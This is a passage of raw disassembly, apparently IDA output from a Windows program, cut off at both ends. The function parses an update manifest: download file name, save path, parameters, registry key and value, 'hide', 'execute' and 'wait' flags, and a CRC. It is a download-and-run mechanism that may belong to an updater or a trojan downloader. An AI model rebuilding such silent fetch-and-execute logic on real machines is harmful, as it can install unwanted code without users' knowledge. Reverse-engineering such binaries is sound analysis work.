mov byte ptr [ebp-4], 1
call sub_4041A5
push 80000000h
push 1
push ecx
mov ecx, esp
mov [ebp-0C8h], esp
push offset byte_419C40
call sub_4114FA
push ecx
mov byte ptr [ebp-4], 4
mov ecx, esp
mov [ebp-20h], esp
push offset aWrConfigversio ; "WR\\configversion"
call sub_4114FA
lea ecx, [ebp-100h]
mov byte ptr [ebp-4], 1
call sub_40671B
push ecx
lea eax, [ebp-2140h]
mov ecx, esp
mov [ebp-20h], esp
push eax
mov byte ptr [ebp-4], 5
call sub_4114FA
lea ecx, [ebp-100h]
call sub_406BA8
lea ecx, [ebp-100h]
mov byte ptr [ebp-4], 1
call sub_4068AF
loc_403632: ; CODE XREF: sub_403488+E4�j
push offset aPaid ; "paid"
lea ecx, [ebp-3Ch]
call sub_404151
mov esi, eax
cmp dword ptr [ebp-14h], 0
mov byte ptr [ebp-4], 6
jnz short loc_403655
push 80004003h
call sub_411822
loc_403655: ; CODE XREF: sub_403488+1C1�j
mov ecx, [ebp-14h]
lea eax, [ebp-94h]
push eax
call sub_40430D
push esi
mov ecx, eax
call sub_4041B8
mov ebx, eax
lea ecx, [ebp-94h]
neg ebx
sbb bl, bl
inc bl
call sub_4041A5
lea ecx, [ebp-3Ch]
mov byte ptr [ebp-4], 1
call sub_4041A5
test bl, bl
jz loc_403753
cmp dword ptr [ebp-14h], 0
jnz short loc_4036A3
push 80004003h
call sub_411822
loc_4036A3: ; CODE XREF: sub_403488+20F�j
mov ecx, [ebp-14h]
lea eax, [ebp-0C4h]
push eax
call sub_40444A
mov ecx, [eax]
mov byte ptr [ebp-4], 7
test ecx, ecx
jz short loc_4036C3
call sub_404243
jmp short loc_4036C5
; ---------------------------------------------------------------------------
loc_4036C3: ; CODE XREF: sub_403488+232�j
xor eax, eax
loc_4036C5: ; CODE XREF: sub_403488+239�j
push eax
lea eax, [ebp-2140h]
push edi
push eax
call dword_4131E4 ; sprintf
add esp, 0Ch
lea ecx, [ebp-0C4h]
mov byte ptr [ebp-4], 1
call sub_4041A5
push 80000000h
push 1
push ecx
mov ecx, esp
mov [ebp-20h], esp
push offset byte_419C40
call sub_4114FA
push ecx
mov byte ptr [ebp-4], 8
mov ecx, esp
mov [ebp-0C8h], esp
push offset aWrP ; "WR\\p"
call sub_4114FA
lea ecx, [ebp-140h]
mov byte ptr [ebp-4], 1
call sub_40671B
push ecx
lea eax, [ebp-2140h]
mov ecx, esp
mov [ebp-20h], esp
push eax
mov byte ptr [ebp-4], 9
call sub_4114FA
lea ecx, [ebp-140h]
call sub_406BA8
lea ecx, [ebp-140h]
mov byte ptr [ebp-4], 1
call sub_4068AF
loc_403753: ; CODE XREF: sub_403488+205�j
push offset aNextupdate ; "nextupdate"
lea ecx, [ebp-9Ch]
call sub_404151
mov esi, eax
cmp dword ptr [ebp-14h], 0
mov byte ptr [ebp-4], 0Ah
jnz short loc_403779
push 80004003h
call sub_411822
loc_403779: ; CODE XREF: sub_403488+2E5�j
mov ecx, [ebp-14h]
lea eax, [ebp-44h]
push eax
call sub_40430D
push esi
mov ecx, eax
call sub_4041B8
mov ebx, eax
lea ecx, [ebp-44h]
neg ebx
sbb bl, bl
inc bl
call sub_4041A5
lea ecx, [ebp-9Ch]
mov byte ptr [ebp-4], 1
call sub_4041A5
test bl, bl
jz loc_403864
cmp dword ptr [ebp-14h], 0
jnz short loc_4037C4
push 80004003h
call sub_411822
loc_4037C4: ; CODE XREF: sub_403488+330�j
mov ecx, [ebp-14h]
lea eax, [ebp-4Ch]
push eax
call sub_40444A
mov ecx, [eax]
mov byte ptr [ebp-4], 0Bh
test ecx, ecx
jz short loc_4037E1
call sub_404243
jmp short loc_4037E3
; ---------------------------------------------------------------------------
loc_4037E1: ; CODE XREF: sub_403488+350�j
xor eax, eax
loc_4037E3: ; CODE XREF: sub_403488+357�j
push eax
lea eax, [ebp-2140h]
push edi
push eax
call dword_4131E4 ; sprintf
add esp, 0Ch
lea ecx, [ebp-4Ch]
mov byte ptr [ebp-4], 1
call sub_4041A5
lea eax, [ebp-2140h]
push eax
call dword_4131A0 ; atol
mov esi, eax
lea eax, [ebp-1Ch]
push eax
call dword_4131A4 ; time
pop ecx
add [ebp-1Ch], esi
pop ecx
push 80000000h
push 1
push 0
push ecx
mov ecx, esp
mov [ebp-20h], esp
push offset aWrNextupdate ; "WR\\nextupdate"
call sub_4114FA
lea ecx, [ebp-120h]
call sub_406374
push dword ptr [ebp-1Ch]
lea ecx, [ebp-120h]
mov byte ptr [ebp-4], 0Ch
call sub_406633
lea ecx, [ebp-120h]
mov byte ptr [ebp-4], 1
call sub_4064C6
loc_403864: ; CODE XREF: sub_403488+326�j
push offset aDownload ; "download"
lea ecx, [ebp-54h]
call sub_404151
mov esi, eax
cmp dword ptr [ebp-14h], 0
mov byte ptr [ebp-4], 0Dh
jnz short loc_403887
push 80004003h
call sub_411822
loc_403887: ; CODE XREF: sub_403488+3F3�j
mov ecx, [ebp-14h]
lea eax, [ebp-0DCh]
push eax
call sub_40430D
push esi
mov ecx, eax
call sub_4041B8
mov ebx, eax
lea ecx, [ebp-0DCh]
neg ebx
sbb bl, bl
inc bl
call sub_4041A5
lea ecx, [ebp-54h]
mov byte ptr [ebp-4], 1
call sub_4041A5
test bl, bl
jz loc_4040FB
cmp dword ptr [ebp-14h], 0
jnz short loc_4038D5
push 80004003h
call sub_411822
loc_4038D5: ; CODE XREF: sub_403488+441�j
mov ecx, [ebp-14h]
lea eax, [ebp-18h]
push eax
call sub_4043E6
mov eax, [ebp-24h]
mov ecx, [ebp+0Ch]
imul eax, 1400Ch
mov byte ptr [ebp-4], 0Eh
mov ebx, 80004003h
lea edi, [eax+ecx+0A000h]
loc_4038FD: ; CODE XREF: sub_403488+C5D�j
push 0
lea ecx, [ebp-18h]
call sub_4062CB
test al, al
jnz loc_4040EA
cmp dword ptr [ebp-18h], 0
jnz short loc_40391B
push ebx
call sub_411822
loc_40391B: ; CODE XREF: sub_403488+48B�j
mov ecx, [ebp-18h]
lea eax, [ebp-10h]
push eax
call sub_4043E6
mov byte ptr [ebp-4], 0Fh
loc_40392B: ; CODE XREF: sub_403488+BDE�j
push 0
lea ecx, [ebp-10h]
call sub_4062CB
test al, al
jnz loc_40406B
cmp dword ptr [ebp-10h], 0
jnz short loc_403949
push ebx
call sub_411822
loc_403949: ; CODE XREF: sub_403488+4B9�j
mov ecx, [ebp-10h]
lea eax, [ebp-0A4h]
push eax
call sub_40444A
mov ecx, [eax]
mov byte ptr [ebp-4], 10h
test ecx, ecx
jz short loc_403969
call sub_404243
jmp short loc_40396B
; ---------------------------------------------------------------------------
loc_403969: ; CODE XREF: sub_403488+4D8�j
xor eax, eax
loc_40396B: ; CODE XREF: sub_403488+4DF�j
push eax
lea eax, [ebp-2140h]
push offset aS ; "%s"
push eax
call dword_4131E4 ; sprintf
add esp, 0Ch
lea ecx, [ebp-0A4h]
mov byte ptr [ebp-4], 0Fh
call sub_4041A5
push offset aRootkey ; "rootkey"
lea ecx, [ebp-0CCh]
call sub_404151
mov esi, eax
cmp dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 11h
jnz short loc_4039B2
push ebx
call sub_411822
loc_4039B2: ; CODE XREF: sub_403488+522�j
mov ecx, [ebp-10h]
lea eax, [ebp-5Ch]
push eax
call sub_40430D
push esi
mov ecx, eax
call sub_4041B8
mov ebx, eax
lea ecx, [ebp-5Ch]
neg ebx
sbb bl, bl
inc bl
call sub_4041A5
lea ecx, [ebp-0CCh]
mov byte ptr [ebp-4], 0Fh
call sub_4041A5
test bl, bl
jz short loc_4039FD
lea eax, [ebp-2140h]
push eax
lea eax, [edi-2000h]
push eax
call dword_4130CC ; lstrcpyA
loc_4039FD: ; CODE XREF: sub_403488+55F�j
push offset aKey ; "key"
lea ecx, [ebp-0ACh]
call sub_404151
mov esi, eax
cmp dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 12h
jnz short loc_403A23
push 80004003h
call sub_411822
loc_403A23: ; CODE XREF: sub_403488+58F�j
mov ecx, [ebp-10h]
lea eax, [ebp-64h]
push eax
call sub_40430D
push esi
mov ecx, eax
call sub_4041B8
mov ebx, eax
lea ecx, [ebp-64h]
neg ebx
sbb bl, bl
inc bl
call sub_4041A5
lea ecx, [ebp-0ACh]
mov byte ptr [ebp-4], 0Fh
call sub_4041A5
test bl, bl
jz short loc_403A68
lea eax, [ebp-2140h]
push eax
push edi
call dword_4130CC ; lstrcpyA
loc_403A68: ; CODE XREF: sub_403488+5D0�j
push offset aKeyvalue ; "keyvalue"
lea ecx, [ebp-0D8h]
call sub_404151
mov esi, eax
cmp dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 13h
jnz short loc_403A8E
push 80004003h
call sub_411822
loc_403A8E: ; CODE XREF: sub_403488+5FA�j
mov ecx, [ebp-10h]
lea eax, [ebp-6Ch]
push eax
call sub_40430D
push esi
mov ecx, eax
call sub_4041B8
mov ebx, eax
lea ecx, [ebp-6Ch]
neg ebx
sbb bl, bl
inc bl
call sub_4041A5
lea ecx, [ebp-0D8h]
mov byte ptr [ebp-4], 0Fh
call sub_4041A5
test bl, bl
jz short loc_403AD9
lea eax, [ebp-2140h]
push eax
lea eax, [edi+2000h]
push eax
call dword_4130CC ; lstrcpyA
loc_403AD9: ; CODE XREF: sub_403488+63B�j
push offset aRequiredfile ; "requiredfile"
lea ecx, [ebp-0B4h]
call sub_404151
mov esi, eax
cmp dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 14h
jnz short loc_403AFF
push 80004003h
call sub_411822
loc_403AFF: ; CODE XREF: sub_403488+66B�j
mov ecx, [ebp-10h]
lea eax, [ebp-74h]
push eax
call sub_40430D
push esi
mov ecx, eax
call sub_4041B8
mov ebx, eax
lea ecx, [ebp-74h]
neg ebx
sbb bl, bl
inc bl
call sub_4041A5
lea ecx, [ebp-0B4h]
mov byte ptr [ebp-4], 0Fh
call sub_4041A5
test bl, bl
jz short loc_403B4A
lea eax, [ebp-2140h]
push eax
lea eax, [edi+4000h]
push eax
call dword_4130CC ; lstrcpyA
loc_403B4A: ; CODE XREF: sub_403488+6AC�j
push offset aFilename ; "filename"
lea ecx, [ebp-0D4h]
call sub_404151
mov esi, eax
cmp dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 15h
jnz short loc_403B70
push 80004003h
call sub_411822
loc_403B70: ; CODE XREF: sub_403488+6DC�j
mov ecx, [ebp-10h]
lea eax, [ebp-7Ch]
push eax
call sub_40430D
push esi
mov ecx, eax
call sub_4041B8
mov ebx, eax
lea ecx, [ebp-7Ch]
neg ebx
sbb bl, bl
inc bl
call sub_4041A5
lea ecx, [ebp-0D4h]
mov byte ptr [ebp-4], 0Fh
call sub_4041A5
test bl, bl
jz short loc_403BBB
lea eax, [ebp-2140h]
push eax
lea eax, [edi-0A000h]
push eax
call dword_4130CC ; lstrcpyA
loc_403BBB: ; CODE XREF: sub_403488+71D�j
push offset aParameters ; "parameters"
lea ecx, [ebp-0BCh]
call sub_404151
mov esi, eax
cmp dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 16h
jnz short loc_403BE1
push 80004003h
call sub_411822
loc_403BE1: ; CODE XREF: sub_403488+74D�j
mov ecx, [ebp-10h]
lea eax, [ebp-30h]
push eax
call sub_40430D
push esi
mov ecx, eax
call sub_4041B8
mov ebx, eax
lea ecx, [ebp-30h]
neg ebx
sbb bl, bl
inc bl
call sub_4041A5
lea ecx, [ebp-0BCh]
mov byte ptr [ebp-4], 0Fh
call sub_4041A5
test bl, bl
jz short loc_403C2C
lea eax, [ebp-2140h]
push eax
lea eax, [edi-8000h]
push eax
call dword_4130CC ; lstrcpyA
loc_403C2C: ; CODE XREF: sub_403488+78E�j
push offset aSaveas ; "SaveAs"
lea ecx, [ebp-0E0h]
call sub_404151
mov esi, eax
cmp dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 17h
jnz short loc_403C52
push 80004003h
call sub_411822
loc_403C52: ; CODE XREF: sub_403488+7BE�j
mov ecx, [ebp-10h]
lea eax, [ebp-8Ch]
push eax
call sub_40430D
push esi
mov ecx, eax
call sub_4041B8
mov ebx, eax
lea ecx, [ebp-8Ch]
neg ebx
sbb bl, bl
inc bl
call sub_4041A5
lea ecx, [ebp-0E0h]
mov byte ptr [ebp-4], 0Fh
call sub_4041A5
test bl, bl
jz short loc_403CA3
lea eax, [ebp-2140h]
push eax
lea eax, [edi-6000h]
push eax
call dword_4130CC ; lstrcpyA
loc_403CA3: ; CODE XREF: sub_403488+805�j
push offset aSavepath ; "SavePath"
lea ecx, [ebp-38h]
call sub_404151
mov esi, eax
cmp dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 18h
jnz short loc_403CC6
push 80004003h
call sub_411822
loc_403CC6: ; CODE XREF: sub_403488+832�j
mov ecx, [ebp-10h]
lea eax, [ebp-34h]
push eax
call sub_40430D
push esi
mov ecx, eax
call sub_4041B8
mov ebx, eax
lea ecx, [ebp-34h]
neg ebx
sbb bl, bl
inc bl
call sub_4041A5
lea ecx, [ebp-38h]
mov byte ptr [ebp-4], 0Fh
call sub_4041A5
test bl, bl
jz short loc_403D0E
lea eax, [ebp-2140h]
push eax
lea eax, [edi-4000h]
push eax
call dword_4130CC ; lstrcpyA
loc_403D0E: ; CODE XREF: sub_403488+870�j
push offset aHide ; "hide"
lea ecx, [ebp-48h]
call sub_404151
mov esi, eax
cmp dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 19h
jnz short loc_403D31
push 80004003h
call sub_411822
loc_403D31: ; CODE XREF: sub_403488+89D�j
mov ecx, [ebp-10h]
lea eax, [ebp-40h]
push eax
call sub_40430D
push esi
mov ecx, eax
call sub_4041B8
mov ebx, eax
lea ecx, [ebp-40h]
neg ebx
sbb bl, bl
inc bl
call sub_4041A5
lea ecx, [ebp-48h]
mov byte ptr [ebp-4], 0Fh
call sub_4041A5
test bl, bl
jz short loc_403D7E
cmp byte ptr [ebp-2140h], 30h
jnz short loc_403D77
and byte ptr [edi+0A001h], 0
jmp short loc_403D7E
; ---------------------------------------------------------------------------
loc_403D77: ; CODE XREF: sub_403488+8E4�j
mov byte ptr [edi+0A001h], 1
loc_403D7E: ; CODE XREF: sub_403488+8DB�j
; sub_403488+8ED�j
push offset aExecute ; "execute"
lea ecx, [ebp-58h]
call sub_404151
mov esi, eax
cmp dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 1Ah
jnz short loc_403DA1
push 80004003h
call sub_411822
loc_403DA1: ; CODE XREF: sub_403488+90D�j
mov ecx, [ebp-10h]
lea eax, [ebp-50h]
push eax
call sub_40430D
push esi
mov ecx, eax
call sub_4041B8
mov ebx, eax
lea ecx, [ebp-50h]
neg ebx
sbb bl, bl
inc bl
call sub_4041A5
lea ecx, [ebp-58h]
mov byte ptr [ebp-4], 0Fh
call sub_4041A5
test bl, bl
jz short loc_403DEE
cmp byte ptr [ebp-2140h], 30h
jnz short loc_403DE7
and byte ptr [edi+0A002h], 0
jmp short loc_403DEE
; ---------------------------------------------------------------------------
loc_403DE7: ; CODE XREF: sub_403488+954�j
mov byte ptr [edi+0A002h], 1
loc_403DEE: ; CODE XREF: sub_403488+94B�j
; sub_403488+95D�j
push offset aWait ; "wait"
lea ecx, [ebp-68h]
call sub_404151
mov esi, eax
cmp dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 1Bh
jnz short loc_403E11
push 80004003h
call sub_411822
loc_403E11: ; CODE XREF: sub_403488+97D�j
mov ecx, [ebp-10h]
lea eax, [ebp-60h]
push eax
call sub_40430D
push esi
mov ecx, eax
call sub_4041B8
mov ebx, eax
lea ecx, [ebp-60h]
neg ebx
sbb bl, bl
inc bl
call sub_4041A5
lea ecx, [ebp-68h]
mov byte ptr [ebp-4], 0Fh
call sub_4041A5
test bl, bl
jz short loc_403E5E
cmp byte ptr [ebp-2140h], 30h
jnz short loc_403E57
and byte ptr [edi+0A004h], 0
jmp short loc_403E5E
; ---------------------------------------------------------------------------
loc_403E57: ; CODE XREF: sub_403488+9C4�j
mov byte ptr [edi+0A004h], 1
loc_403E5E: ; CODE XREF: sub_403488+9BB�j
; sub_403488+9CD�j
push offset aNewupdater ; "newupdater"
lea ecx, [ebp-78h]
call sub_404151
mov esi, eax
cmp dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 1Ch
jnz short loc_403E81
push 80004003h
call sub_411822
loc_403E81: ; CODE XREF: sub_403488+9ED�j
mov ecx, [ebp-10h]
lea eax, [ebp-70h]
push eax
call sub_40430D
push esi
mov ecx, eax
call sub_4041B8
mov ebx, eax
lea ecx, [ebp-70h]
neg ebx
sbb bl, bl
inc bl
call sub_4041A5
lea ecx, [ebp-78h]
mov byte ptr [ebp-4], 0Fh
call sub_4041A5
test bl, bl
jz short loc_403ECE
cmp byte ptr [ebp-2140h], 30h
jnz short loc_403EC7
and byte ptr [edi+0A000h], 0
jmp short loc_403ECE
; ---------------------------------------------------------------------------
loc_403EC7: ; CODE XREF: sub_403488+A34�j
mov byte ptr [edi+0A000h], 1
loc_403ECE: ; CODE XREF: sub_403488+A2B�j
; sub_403488+A3D�j
push offset aVersion_0 ; "version"
lea ecx, [ebp-88h]
call sub_404151
mov esi, eax
cmp dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 1Dh
jnz short loc_403EF4
push 80004003h
call sub_411822
loc_403EF4: ; CODE XREF: sub_403488+A60�j
mov ecx, [ebp-10h]
lea eax, [ebp-80h]
push eax
call sub_40430D
push esi
mov ecx, eax
call sub_4041B8
mov ebx, eax
lea ecx, [ebp-80h]
neg ebx
sbb bl, bl
inc bl
call sub_4041A5
lea ecx, [ebp-88h]
mov byte ptr [ebp-4], 0Fh
call sub_4041A5
test bl, bl
jz short loc_403F3F
lea eax, [ebp-2140h]
push eax
lea eax, [edi+6000h]
push eax
call dword_4130CC ; lstrcpyA
loc_403F3F: ; CODE XREF: sub_403488+AA1�j
push offset aIdentifier ; "identifier"
lea ecx, [ebp-98h]
call sub_404151
mov esi, eax
cmp dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 1Eh
jnz short loc_403F65
push 80004003h
call sub_411822
loc_403F65: ; CODE XREF: sub_403488+AD1�j
mov ecx, [ebp-10h]
lea eax, [ebp-90h]
push eax
call sub_40430D
push esi
mov ecx, eax
call sub_4041B8
mov ebx, eax
lea ecx, [ebp-90h]
neg ebx
sbb bl, bl
inc bl
call sub_4041A5
lea ecx, [ebp-98h]
mov byte ptr [ebp-4], 0Fh
call sub_4041A5
test bl, bl
jz short loc_403FB6
lea eax, [ebp-2140h]
push eax
lea eax, [edi+8000h]
push eax
call dword_4130CC ; lstrcpyA
loc_403FB6: ; CODE XREF: sub_403488+B18�j
push offset aCrc ; "crc"
lea ecx, [ebp-0A8h]
call sub_404151
mov esi, eax
cmp dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 1Fh
jnz short loc_403FDC
push 80004003h
call sub_411822
loc_403FDC: ; CODE XREF: sub_403488+B48�j
mov ecx, [ebp-10h]
lea eax, [ebp-0A0h]
push eax
call sub_40430D
push esi
mov ecx, eax
call sub_4041B8
mov ebx, eax
lea ecx, [ebp-0A0h]
neg ebx
sbb bl, bl
inc bl
call sub_4041A5
lea ecx, [ebp-0A8h]
mov byte ptr [ebp-4], 0Fh
call sub_4041A5
test bl, bl
jz short loc_40402D
lea eax, [ebp-2140h]
push eax
call dword_4131A8 ; atoi
pop ecx
mov [edi+0A008h], eax
loc_40402D: ; CODE XREF: sub_403488+B8F�j
cmp dword ptr [ebp-10h], 0
jnz short loc_40403D
push 80004003h
call sub_411822
loc_40403D: ; CODE XREF: sub_403488+BA9�j
mov ecx, [ebp-10h]
lea eax, [ebp-0B0h]
push eax
call sub_404418
push dword ptr [eax]
lea ecx, [ebp-10h]
call sub_4062A0
lea ecx, [ebp-0B0h]
call sub_406293
mov ebx, 80004003h
jmp loc_40392B
; ---------------------------------------------------------------------------
loc_40406B: ; CODE XREF: sub_403488+4AF�j
lea esi, [edi-4000h]
push 0Ah
push offset aWindows ; "windows"
push esi
call dword_4131AC ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_4040A0
mov eax, [ebp-28h]
push dword ptr [eax+1Ch]
push esi
call sub_411628 ; strcpy
push offset dword_417130
push esi
call sub_411640 ; strcat
add esp, 10h
loc_4040A0: ; CODE XREF: sub_403488+BFC�j
inc dword ptr [ebp-24h]
lea ecx, [ebp-10h]
add edi, 1400Ch
mov byte ptr [ebp-4], 0Eh
call sub_406293
cmp dword ptr [ebp-18h], 0
jnz short loc_4040C1
push ebx
call sub_411822
loc_4040C1: ; CODE XREF: sub_403488+C31�j
mov ecx, [ebp-18h]
lea eax, [ebp-0B8h]
push eax
call sub_404418
push dword ptr [eax]
lea ecx, [ebp-18h]
call sub_4062A0
lea ecx, [ebp-0B8h]
call sub_406293
jmp loc_4038FD
; ---------------------------------------------------------------------------
loc_4040EA: ; CODE XREF: sub_403488+481�j
lea ecx, [ebp-18h]
mov byte ptr [ebp-4], 1
call sub_406293
mov edi, offset aS ; "%s"
loc_4040FB: ; CODE XREF: sub_403488+437�j
cmp dword ptr [ebp-14h], 0
jnz short loc_40410B
push 80004003h
call sub_411822
loc_40410B: ; CODE XREF: sub_403488+C77�j
mov ecx, [ebp-14h]
lea eax, [ebp-2Ch]
push eax
call sub_404418
push dword ptr [eax]
lea ecx, [ebp-14h]
call sub_4062A0
lea ecx, [ebp-2Ch]
call sub_406293
xor ebx, ebx
jmp loc_4034FB
; ---------------------------------------------------------------------------
loc_404130: ; CODE XREF: sub_403488+7E�j
lea ecx, [ebp-14h]
call sub_406293
lea ecx, [ebp+8]
call sub_406293
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 8
sub_403488 endp
; =============== S U B R O U T I N E =======================================
sub_404151 proc near ; CODE XREF: sub_403488+8F�p
; sub_403488+1B2�p ...
mov eax, offset loc_411DB2
call sub_41163A ; _EH_prolog
push ecx
push esi
mov esi, ecx
push 0Ch
call sub_4114F4
pop ecx
mov ecx, eax
mov [ebp-10h], ecx
and dword ptr [ebp-4], 0
test ecx, ecx
jz short loc_40417E
push dword ptr [ebp+8]
call sub_4041E3
jmp short loc_404180
; ---------------------------------------------------------------------------
loc_40417E: ; CODE XREF: sub_404151+21�j
xor eax, eax
loc_404180: ; CODE XREF: sub_404151+2B�j
or dword ptr [ebp-4], 0FFFFFFFFh
mov [esi], eax
test eax, eax
jnz short loc_404194
push 8007000Eh
call sub_411822
loc_404194: ; CODE XREF: sub_404151+37�j
mov ecx, [ebp-0Ch]
mov eax, esi
pop esi
mov large fs:0, ecx
leave
retn 4
sub_404151 endp
; =============== S U B R O U T I N E =======================================
sub_4041A5 proc near ; CODE XREF: sub_403488+CE�p
; sub_403488+DD�p ...
push esi
mov esi, ecx
mov ecx, [esi]
test ecx, ecx
jz short loc_4041B6
call sub_404216
and dword ptr [esi], 0
loc_4041B6: ; CODE XREF: sub_4041A5+7�j
pop esi
retn
sub_4041A5 endp
; =============== S U B R O U T I N E =======================================
sub_4041B8 proc near ; CODE XREF: sub_403488+BB�p
; sub_403488+1DF�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, [ecx]
mov eax, [eax]
cmp ecx, eax
jnz short loc_4041C8
xor eax, eax
jmp short locret_4041E0
; ---------------------------------------------------------------------------
loc_4041C8: ; CODE XREF: sub_4041B8+A�j
test ecx, ecx
jnz short loc_4041D1
or eax, 0FFFFFFFFh
jmp short locret_4041E0
; ---------------------------------------------------------------------------
loc_4041D1: ; CODE XREF: sub_4041B8+12�j
test eax, eax
jnz short loc_4041DA
push 1
pop eax
jmp short locret_4041E0
; ---------------------------------------------------------------------------
loc_4041DA: ; CODE XREF: sub_4041B8+1B�j
push eax
call sub_40426D
locret_4041E0: ; CODE XREF: sub_4041B8+E�j
; sub_4041B8+17�j ...
retn 4
sub_4041B8 endp
; =============== S U B R O U T I N E =======================================
sub_4041E3 proc near ; CODE XREF: sub_404151+26�p
; sub_409670+47�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
and dword ptr [esi+4], 0
mov dword ptr [esi+8], 1
call sub_4118CF
test eax, eax
mov [esi], eax
jnz short loc_404210
cmp [esp+4+arg_0], eax
jz short loc_404210
push 8007000Eh
call sub_411822
loc_404210: ; CODE XREF: sub_4041E3+1B�j
; sub_4041E3+21�j
mov eax, esi
pop esi
retn 4
sub_4041E3 endp
; =============== S U B R O U T I N E =======================================
sub_404216 proc near ; CODE XREF: sub_4041A5+9�p
push esi
mov esi, ecx
push edi
lea edi, [esi+8]
push edi
call dword_4130C4 ; InterlockedDecrement
test eax, eax
jnz short loc_40423E
test esi, esi
jz short loc_40423A
mov ecx, esi
call sub_4042ED
push esi
call sub_4114EE
pop ecx
loc_40423A: ; CODE XREF: sub_404216+14�j
xor eax, eax
jmp short loc_404240
; ---------------------------------------------------------------------------
loc_40423E: ; CODE XREF: sub_404216+10�j
mov eax, [edi]
loc_404240: ; CODE XREF: sub_404216+26�j
pop edi
pop esi
retn
sub_404216 endp
; =============== S U B R O U T I N E =======================================
sub_404243 proc near ; CODE XREF: sub_403488+113�p
; sub_403488+234�p ...
push esi
mov esi, ecx
cmp dword ptr [esi+4], 0
jnz short loc_404268
push dword ptr [esi]
call sub_411944
test eax, eax
mov [esi+4], eax
jnz short loc_404268
cmp [esi], eax
jz short loc_404268
push 8007000Eh
call sub_411822
loc_404268: ; CODE XREF: sub_404243+7�j
; sub_404243+15�j ...
mov eax, [esi+4]
pop esi
retn
sub_404243 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40426D proc near ; CODE XREF: sub_4041B8+23�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
mov ebx, ecx
push esi
push edi
mov eax, [ebx]
test eax, eax
jnz short loc_404286
mov eax, [ebp+arg_0]
mov eax, [eax]
neg eax
sbb eax, eax
jmp short loc_4042E6
; ---------------------------------------------------------------------------
loc_404286: ; CODE XREF: sub_40426D+C�j
mov edi, [ebp+arg_0]
cmp dword ptr [edi], 0
jnz short loc_404293
push 1
pop eax
jmp short loc_4042E6
; ---------------------------------------------------------------------------
loc_404293: ; CODE XREF: sub_40426D+1F�j
mov esi, dword_413278
push eax
call esi
push dword ptr [edi]
mov [ebp+arg_0], eax
call esi
mov edx, [ebp+arg_0]
cmp edx, eax
jbe short loc_4042AC
mov edx, eax
loc_4042AC: ; CODE XREF: sub_40426D+3B�j
mov ecx, [ebx]
mov edi, [edi]
loc_4042B0: ; CODE XREF: sub_40426D+57�j
mov esi, edx
dec edx
test esi, esi
jbe short loc_4042D2
mov bx, [edi]
mov si, [ecx]
inc edi
inc edi
inc ecx
inc ecx
cmp si, bx
jz short loc_4042B0
movzx edx, word ptr [edi-2]
movzx eax, word ptr [ecx-2]
sub eax, edx
jmp short loc_4042E6
; ---------------------------------------------------------------------------
loc_4042D2: ; CODE XREF: sub_40426D+48�j
cmp [ebp+arg_0], eax
jnb short loc_4042DC
or eax, 0FFFFFFFFh
jmp short loc_4042E6
; ---------------------------------------------------------------------------
loc_4042DC: ; CODE XREF: sub_40426D+68�j
xor ecx, ecx
cmp [ebp+arg_0], eax
setnz cl
mov eax, ecx
loc_4042E6: ; CODE XREF: sub_40426D+17�j
; sub_40426D+24�j ...
pop edi
pop esi
pop ebx
pop ebp
retn 4
sub_40426D endp
; =============== S U B R O U T I N E =======================================
sub_4042ED proc near ; CODE XREF: sub_404216+18�p
push esi
mov esi, ecx
mov eax, [esi]
test eax, eax
jz short loc_4042FD
push eax
call dword_413274
loc_4042FD: ; CODE XREF: sub_4042ED+7�j
mov esi, [esi+4]
test esi, esi
jz short loc_40430B
push esi
call sub_4114EE
pop ecx
loc_40430B: ; CODE XREF: sub_4042ED+15�j
pop esi
retn
sub_4042ED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40430D proc near ; CODE XREF: sub_403488+B3�p
; sub_403488+1D7�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
mov esi, ecx
lea ecx, [ebp+var_4]
mov eax, [esi]
push ecx
push esi
call dword ptr [eax+1Ch]
test eax, eax
jge short loc_404332
push offset dword_417238
push esi
push eax
call sub_411830
loc_404332: ; CODE XREF: sub_40430D+17�j
mov ecx, [ebp+arg_0]
push 0
push [ebp+var_4]
call sub_404347
mov eax, [ebp+arg_0]
pop esi
leave
retn 4
sub_40430D endp
; =============== S U B R O U T I N E =======================================
sub_404347 proc near ; CODE XREF: sub_40430D+2D�p
; sub_40444A+2D�p
mov eax, offset loc_411DC6
call sub_41163A ; _EH_prolog
push ecx
push esi
mov esi, ecx
push 0Ch
call sub_4114F4
pop ecx
mov ecx, eax
mov [ebp-10h], ecx
and dword ptr [ebp-4], 0
test ecx, ecx
jz short loc_404377
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40439E
jmp short loc_404379
; ---------------------------------------------------------------------------
loc_404377: ; CODE XREF: sub_404347+21�j
xor eax, eax
loc_404379: ; CODE XREF: sub_404347+2E�j
or dword ptr [ebp-4], 0FFFFFFFFh
mov [esi], eax
test eax, eax
jnz short loc_40438D
push 8007000Eh
call sub_411822
loc_40438D: ; CODE XREF: sub_404347+3A�j
mov ecx, [ebp-0Ch]
mov eax, esi
pop esi
mov large fs:0, ecx
leave
retn 8
sub_404347 endp
; =============== S U B R O U T I N E =======================================
sub_40439E proc near ; CODE XREF: sub_404347+29�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push esi
mov esi, ecx
push edi
mov edi, [esp+8+arg_0]
